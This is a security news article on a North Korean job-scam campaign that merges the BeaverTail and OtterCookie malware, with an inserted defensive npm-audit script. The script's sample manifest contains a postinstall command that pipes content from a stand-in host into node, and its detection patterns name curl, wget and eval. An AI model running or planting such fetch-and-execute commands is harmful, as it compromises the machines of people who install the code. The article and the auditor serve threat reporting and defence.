North Korean Hacker Group Improves Malware Toolset by Merging BeaverTail and OtterCookie Functions

News Desk
Published: October 18, 2025
Last updated: October 18, 2025 12:41 am
A North Korean threat actor associated with the Contagious Interview campaign has been observed refining its malware toolkit by integrating functionalities from two distinct malware programs, BeaverTail and OtterCookie. This advancement was highlighted in findings by Cisco Talos, which reported that the most recent operations from the group show an increasing overlap between these two malware families. Notably, OtterCookie has received new enhancements, including modules for keylogging and taking screenshots.

The hacking activity is attributed to multiple aliases within the cybersecurity community, including CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, and others. In a striking development, Google Threat Intelligence Group (GTIG) and Mandiant have also identified the actor’s use of an advanced technique named EtherHiding. This method allows the group to fetch subsequent payloads from decentralized blockchain networks like the BNB Smart Chain and Ethereum, effectively transforming these decentralized infrastructures into resilient command-and-control servers. This tactic marks the first known instance of a nation-state operator employing EtherHiding, a strategy typically associated with cybercriminal organizations.

The Contagious Interview campaign itself first emerged around late 2022, characterized by North Korean hackers impersonating hiring organizations. Job seekers were duped into installing information-stealing malware under the guise of a technical assessment or coding task, leading to unauthorized access to sensitive data and cryptocurrencies.

In recent months, the campaign has evolved, incorporating ClickFix social engineering strategies to distribute various malware strains, including GolangGhost, PylangGhost, TsunamiKit, Tropidoor, and AkdoorTea. Central to these attacks are the malware families BeaverTail, OtterCookie, and InvisibleFerret. BeaverTail functions primarily as an information stealer and downloader, while OtterCookie, which was first detected in September 2024, was designed to communicate with remote servers to execute commands on compromised systems.

Cisco Talos reports that recent activity targeted an organization in Sri Lanka, which likely fell victim to a scam involving a fraudulent job offer that led to the installation of a malicious Node.js application named Chessfi, hosted on Bitbucket. The malicious application utilized a dependency from a package called “node-nvm-ssh,” which had previously been published on the official npm repository before being swiftly removed by the maintainers after attracting 306 downloads.

Upon installation, the malware leverages a postinstall hook in its configuration to execute a JavaScript payload that further loads additional scripts responsible for executing the final malware payload. Researchers noted that the latest iteration of OtterCookie demonstrates characteristics of both BeaverTail and OtterCookie, indicating a merging of their functionalities. This version introduces new modules such as a keylogger, a screenshotting feature, and an auxiliary clipboard monitoring capability, all relying on legitimate npm packages for their execution.
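The abuse described above rests on a standard npm feature: any dependency's package.json may declare install-time lifecycle scripts (preinstall, install, postinstall, prepare) that run with the installing user's privileges. The script below is an added example, not code from the article, Cisco Talos, or the Chessfi project, showing how a defender can audit a project's manifest and its dependencies' manifests for such hooks and flag commands that fetch or execute remote code. The package names, manifests and commands in it are constructed samples, not the real "node-nvm-ssh" package; a real run would read node_modules/<name>/package.json for each dependency instead of the inline map.

```javascript
// Added example (not from the article or Cisco Talos): audit npm manifests for
// install-time lifecycle scripts, the mechanism the article says the malicious
// dependency used. All manifests below are constructed samples.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristics for commands that deserve a human look: pulling remote content,
// running a bundled script with node, or evaluating generated code.
const SUSPICIOUS_PATTERNS = [
  { name: "remote fetch", re: /\b(curl|wget|https?:\/\/)/i },
  { name: "node exec", re: /\bnode\s+\S+\.js\b/i },
  { name: "eval/Function", re: /\b(eval|new Function)\b/ },
  { name: "inline node -e", re: /\bnode\s+-e\b/ },
];

// Inspect one parsed package.json and report every lifecycle hook it declares,
// together with the heuristic reasons (if any) that make the command suspicious.
function findLifecycleScripts(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const command = scripts[hook];
    const reasons = SUSPICIOUS_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.name);
    findings.push({ package: pkg.name || "<unnamed>", hook, command, reasons });
  }
  return findings;
}

// Audit the root manifest plus the manifests of its direct dependencies.
// `manifests` maps dependency name -> parsed package.json; in a real run you
// would populate it by reading node_modules/<name>/package.json for each entry.
function auditDependencyTree(rootPkg, manifests) {
  const report = { declared: [], flagged: [] };
  const deps = Object.assign({}, rootPkg.dependencies, rootPkg.devDependencies);
  const toCheck = [rootPkg, ...Object.keys(deps).map((n) => manifests[n]).filter(Boolean)];
  for (const pkg of toCheck) {
    for (const finding of findLifecycleScripts(pkg)) {
      report.declared.push(finding);
      if (finding.reasons.length > 0) report.flagged.push(finding);
    }
  }
  return report;
}

// --- constructed sample input (hypothetical package names, not real ones) ---
const rootPkg = {
  name: "sample-app",
  dependencies: { "benign-lib": "^1.0.0", "hypothetical-dep": "^2.3.1" },
  scripts: { test: "node test.js" }, // not a lifecycle hook, so never reported
};
const manifests = {
  "benign-lib": { name: "benign-lib", scripts: { build: "tsc" } },
  "hypothetical-dep": {
    name: "hypothetical-dep",
    scripts: { postinstall: "node scripts/setup.js && curl -s https://example.invalid/x | node" },
  },
};

// Run the audit over the sample and print anything flagged; returns the report.
function demo() {
  const report = auditDependencyTree(rootPkg, manifests);
  for (const f of report.flagged) {
    console.log(`[FLAG] ${f.package} ${f.hook}: ${f.command} (${f.reasons.join(", ")})`);
  }
  return report;
}

if (typeof require !== "undefined" && require.main === module) demo();
```

On the sample input the audit reports one declared hook and flags it, because the postinstall command both runs a bundled script with node and pipes remote content into node. Review anything flagged before installing, and consider installing with `npm install --ignore-scripts` (then running only the hooks you have read) so that a dependency cannot execute code merely by being added to the tree.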

Additional functionalities present in the new iteration of OtterCookie include the ability to enumerate browser profiles and extensions, extract information from web browsers and cryptocurrency wallets, and install persistent remote access tools like AnyDesk. The malware also systematically searches the file system for valuable data related to cryptocurrencies and captures clipboard content for exfiltration to the threat actor’s command-and-control servers.

Talos also detected a Qt-based BeaverTail artifact and a malicious Visual Studio Code extension containing code from both BeaverTail and OtterCookie. This development raises questions about whether the group is exploring new malware delivery methods. Researchers suggested that the Visual Studio Code extension might instead be the work of another actor, not necessarily connected to Famous Chollima, since it departs from the group's typical tactics.